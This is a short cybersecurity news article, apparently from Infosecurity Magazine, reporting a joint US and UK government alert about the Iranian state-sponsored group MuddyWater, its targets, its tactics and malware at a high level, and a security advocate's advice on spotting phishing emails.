CISA Issues MuddyWater Warning

Written by

Authorities in the UK and United States have issued an alert regarding a group of Iranian government-sponsored advanced persistent threat (APT) actors known as MuddyWater.

The actors, who are also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros, have been observed conducting cyber espionage and other malicious cyber operations in Asia, Africa, Europe and North America.

A joint alert issued on Thursday by CISA, the FBI, NSA, US Cyber Command Cyber National Mission Force and the UK’s National Cyber Security Centre, warned that MuddyWater has been targeting a range of government and private sector organizations across multiple industries including telecommunications, defense, local government and oil and natural gas.

Since approximately 2018, MuddyWater has conducted broad cyber campaigns under the auspices of the Iranian Ministry of Intelligence and Security (MOIS), providing stolen data and accesses both to the Iranian government and other malicious cyber actors.

"MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware," states the alert. 

"These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs) – to trick legitimate programs into running malware – and obfuscating PowerShell scripts to hide command and control (C2) functions."

Recently, MuddyWater actors have been spotted using multiple malware sets including PowGoop, Small Sieve, Canopy/Starwhale, Mori and POWERSTATS for loading malware, backdoor access, persistence and exfiltration.

The APT actors have also attempted to gain access to sensitive government and commercial networks through a spearphishing campaign that coaxes victims into downloading ZIP files. Victim unwittingly download either an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious file onto the victim’s network.

James McQuiggan, security awareness advocate at KnowBe4, advised email users to "conduct a quick checklist of 'Do I know this person,' 'Am I expecting this email,' 'Is the request unusual and unlike the sender' and 'Is there a sense of urgency' to the request?"

He added: "Answering these questions unfavorably should trigger the user to examine the email a little closer and report to their IT or InfoSec teams."

What’s hot on Infosecurity Magazine?